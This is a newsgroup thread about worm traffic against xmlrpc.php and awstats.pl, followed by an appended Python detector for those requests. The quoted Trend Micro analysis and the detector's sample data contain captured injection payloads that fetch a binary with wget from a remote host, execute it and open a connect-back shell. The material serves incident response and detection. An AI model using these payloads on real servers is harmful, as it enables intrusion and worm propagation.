Re: XML RPC Exploit Attack
- From: "John Torrey" <John Torrey@xxxxxxxxxxxxxxxxxxxxxxxxx>
- Date: Thu, 26 Jan 2006 11:11:02 -0800
Joseph,
Did this remove the warning from your server about this exploit? We just
installed the TrendMicro security suite on our network and it rings my email
with these alerts all day long... how far do I take them? How far have you
scaled back the extreme viral search warnings on the Trend product? Any
suggestions?
Please email me at jtorrey2charter.net..thanks!!!!
John Torrey (JT)
Information Services
"Joseph Bittman MVP MCSD" wrote:
> December 20, 2005
>
> Excellent! :-) Thank you! I don't use PHP or those programs, and therefore
> the RPC one isn't an issue. Also, I don't allow CGI scripts and I don't have
> a cgi-bin or awstats folder either. :-) Thanks again!
>
> --
>
> Joseph Bittman
> Microsoft Certified Solution Developer
> Microsoft Most Valuable Professional -- DPM
>
> Blog/Web Site: http://71.39.42.23/
>
>
>
> "David H. Lipman" <DLipman~nospam~@Verizon.Net> wrote in message
> news:eTJmrfbBGHA.2040@xxxxxxxxxxxxxxxxxxxxxxx
> > From: "Joseph Bittman MVP MCSD" <RyanBittman@xxxxxxx>
> >
> > | December 20, 2005
> > |
> > | Wow! The software is new to me and I didn't know it had other logs... I
> > | have found the event logs where it shows more information. I'm getting hit
> > | by the XML_RPC_Exploit description a LOT. It is coming in on port 80
> > | (http -- this computer hosts a small personal web site which relies heavily
> > | on XML stores)
> > |
> > | Basically, there are blocks of 10-20 exploit attempts in 1 minute timespans,
> > | and then it switches source IPs and tries again about 5 hours later... (it
> > | also switches SourcePort every attempt -- so each block from an IP will have
> > | about 10-20 different sourceports)
> > |
> > | IPs:
> > | 82.159.46.137
> > | 217.129.49.18 -- Also attempted some AWSTATS_CONFIGDIR_EXPLOIT attempts
> > | 203.172.162.242
> > | 61.145.142.189
> > | 209.152.181.152 -- Also attempted some AWSTATS_CONFIGDIR_EXPLOIT attempts
> > | 221.228.241.222
> > |
> > | What do you think about this? It is blocking them every time, although I
> > | hate for my web server to get hit with this type of useless waste of CPU
> > | power (Yes, I'm worried too about DoS.).... Any ideas? -- Also, are these
> > | IPs something which Trend Micro or someone else might be interested in for a
> > | 'Banned/Suspect IP address list'? Thanks for your help!
> > |
> >
> > As promised, from my liaison at Trend Micro.
> >
> > -----------
> > * exploits awstats.pl vulnerability
> >
> > * exploits xmlrpc.php
> >
> >
> > From ISC:
> > "You can find the details of the vulnerability at:
> > http://www.gulftech.org/?node=research&article_id=00088-07022005
> > http://www.securityfocus.com/bid/14088/
> > http://secunia.com/advisories/15852/
> >
> > For a list of vulnerable applications, please refer to:
> > http://www.securityfocus.com/bid/14088/info
> > http://www.osvdb.org/17793
> >
> > If you are running a vulnerable version, you are advised to upgrade
> > immediately:
> > http://www.securityfocus.com/bid/14088/solution"
> >
> >
> > However, for the xmlrpc.php, instead of downloading the file 'cback' or
> > 'lupii', it now downloads a file named 'listen'. Based on initial analysis,
> > it seems to have both the functionalities of 'cback' and 'lupii':
> > * it can be run with an argument, which IMO, acts as a connect-back
> > program for the attacker (same as cback - HKTL_CALLBACK.A)
> >
> > * it also has worm capabilities to propagate via awstats.pl or xml-rpc
> > exploits (same as lupii - ELF_LUPPER.A) Possible ELF_LUPPER.B?
> >
> > POST requests to the following URL's:
> > * /xmlrpc/xmlrpc.php
> >
> > * /wordpress/xmlrpc.php
> >
> > * /phpgroupware/xmlrpc.php
> >
> > * /drupal/xmlrpc.php
> >
> > * /blogs/xmlsrv/xmlrpc.php
> >
> > * /blog/xmlsrv/xmlrpc.php
> >
> > * /blog/xmlrpc.php
> >
> >
> > This, of course, attempts to exploit the XML-RPC vulnerability.
> >
> > It also sends a GET request to exploit the awstats.pl configdir
> > vulnerability and targets the following URL's:
> > * /cgi-bin/
> >
> > * /cgi-bin/awstats/
> >
> > * /awstats/
> >
> >
> > The malware appends the exploit code at the end of these directories.
> > Sample captures of the 2 attacks are as follows:
> >
> > XML-RPC
> > ==============================
> > POST /xmlrpc.php HTTP/1.1
> > Host: xxx.xxx.xxx.xxx
> > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
> > Content-Type: text/xml
> > Content-Length:269
> >
> > <?xml version="1.0"?>
> > <methodCall><methodName>test.method</methodName>
> > <params><param><value><name>',''));
> > echo '_begin_';echo `cd /tmp;wget 24.xxx.xxx.18/listen;chmod +x listen;./listen `;
> > echo '_end_';exit;/*</name></value></param></params></methodCall>
> > ==============================
> >
> >
> >
> > AWSTATS.PL
> > ==============================
> > GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1
> > Host: xxx.xxx.xxx.xxx
> > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
> > ==============================
> >
> >
> > -----------
> >
> > --
> > Dave
> > http://www.claymania.com/removal-trojan-adware.html
> > http://www.ik-cs.com/got-a-virus.htm
> >
> >
>
>
>
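The two request patterns in the Trend Micro note quoted above, turned into a small detector. This is an added example, not code from this thread or from any Trend Micro product: the request lines and bodies reproduce the two captures in the note, the detection names are the ones Joseph saw in his logs, and everything else (the record format, timestamps, source ports, the benign XML-RPC call) is constructed for the example. It classifies each request, pulls the wget drop site out of the payload as an indicator, and reports per source IP whether the attempts arrived as a burst, which is the pattern described in the thread.

```python
# Flag the two Lupper-style request patterns from the captures above and
# summarize the per-source bursts the thread describes (added example).
import re
from datetime import datetime
from urllib.parse import unquote, urlsplit

# Paths the worm POSTs to, as listed in the Trend Micro note.
XMLRPC_PATHS = {"/xmlrpc.php", "/xmlrpc/xmlrpc.php", "/wordpress/xmlrpc.php",
                "/phpgroupware/xmlrpc.php", "/drupal/xmlrpc.php",
                "/blogs/xmlsrv/xmlrpc.php", "/blog/xmlsrv/xmlrpc.php",
                "/blog/xmlrpc.php"}
AWSTATS_DIRS = ("/cgi-bin/", "/cgi-bin/awstats/", "/awstats/")
# XML-RPC payload: inside <name> it closes the quoted string and the call that
# the vulnerable library hands to eval(), then runs a command in backticks (or
# a PHP exec function) and comments out the rest with /*.
XMLRPC_INJECT = re.compile(
    r"<name>[^<]*\)\)\s*;[^<]*(?:`|\b(?:system|exec|passthru|shell_exec)\s*\()",
    re.S)
# awstats.pl: a configdir value wrapped in pipes is opened as a command.
AWSTATS_INJECT = re.compile(r"^\|.*\|$", re.S)
# The drop site the payload fetches with wget (stop at ; or a quote).
WGET = re.compile(r"wget\s+([^\s;`'\"]+)")


def query_params(query):
    """Split on & only: parse_qs before Python 3.9.2 also split on ;, which
    would tear the injected command apart."""
    params = {}
    for pair in query.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params.setdefault(unquote(key), []).append(unquote(value))
    return params


def classify(req):
    """Return the detection name for one request, or None if benign."""
    url = urlsplit(req["path"])
    if (req["method"] == "POST" and url.path in XMLRPC_PATHS
            and XMLRPC_INJECT.search(req.get("body", ""))):
        return "XML_RPC_EXPLOIT"
    if (req["method"] == "GET" and url.path.startswith(AWSTATS_DIRS)
            and url.path.endswith("awstats.pl")):
        for value in query_params(url.query).get("configdir", []):
            if AWSTATS_INJECT.match(value):
                return "AWSTATS_CONFIGDIR_EXPLOIT"
    return None


def download_target(req):
    """Pull the wget target out of the URL-decoded payload."""
    match = WGET.search(unquote(req["path"]) + " " + req.get("body", ""))
    return match.group(1) if match else None


def summarize(reqs, window=60):
    """Per source IP: attempts, detections, source ports, drop sites, and
    whether two or more attempts fell inside `window` seconds (a burst)."""
    per_src = {}
    for req in reqs:
        name = classify(req)
        if name is None:
            continue
        entry = per_src.setdefault(req["src"], {
            "attempts": 0, "detections": set(), "source_ports": set(),
            "targets": set(), "times": []})
        entry["attempts"] += 1
        entry["detections"].add(name)
        entry["source_ports"].add(req["sport"])
        entry["targets"].add(download_target(req))
        entry["times"].append(datetime.fromisoformat(req["ts"]))
    for entry in per_src.values():
        times = sorted(entry.pop("times"))
        entry["targets"].discard(None)
        entry["burst"] = (len(times) >= 2
                          and (times[-1] - times[0]).total_seconds() <= window)
    return per_src


# Constructed sample: request lines and bodies follow the captures above;
# timestamps, source ports and the benign XML-RPC call are invented.
XMLRPC_BODY = (
    '<?xml version="1.0"?><methodCall><methodName>test.method</methodName>'
    "<params><param><value><name>',''));echo '_begin_';echo `cd /tmp;"
    "wget 24.xxx.xxx.18/listen;chmod +x listen;./listen `;echo '_end_';"
    "exit;/*</name></value></param></params></methodCall>")
AWSTATS_PATH = (
    "/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20"
    "24%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20"
    "216%2e102%2e212%2e115;echo%20YYY;echo|")
SAMPLE = [
    {"ts": "2005-12-20T03:14:05", "src": "82.159.46.137", "sport": 40211,
     "method": "POST", "path": "/xmlrpc.php", "body": XMLRPC_BODY},
    {"ts": "2005-12-20T03:14:31", "src": "82.159.46.137", "sport": 40230,
     "method": "POST", "path": "/blog/xmlrpc.php", "body": XMLRPC_BODY},
    {"ts": "2005-12-20T08:02:17", "src": "217.129.49.18", "sport": 51908,
     "method": "GET", "path": AWSTATS_PATH, "body": ""},
    {"ts": "2005-12-20T13:10:02", "src": "217.129.49.18", "sport": 51920,
     "method": "POST", "path": "/wordpress/xmlrpc.php", "body": XMLRPC_BODY},
    {"ts": "2005-12-20T09:00:00", "src": "10.0.0.5", "sport": 33001,
     "method": "POST", "path": "/wordpress/xmlrpc.php", "body":
     "<methodCall><methodName>system.listMethods</methodName></methodCall>"},
]
```

The query string is split by hand rather than with `urllib.parse.parse_qs` because older interpreters treated `;` as a second separator, which would cut the awstats command (`cd /tmp;wget ...`) into pieces and hide the surrounding pipes; the `%2e`/`%3b` escapes in the capture are decoded with `unquote` before the pipe check so that encoding the delimiters does not evade it. The legitimate `system.listMethods` call to the same `xmlrpc.php` path is left alone, since the match requires the `'))` closure followed by command execution inside `<name>`, not merely a POST to a known path.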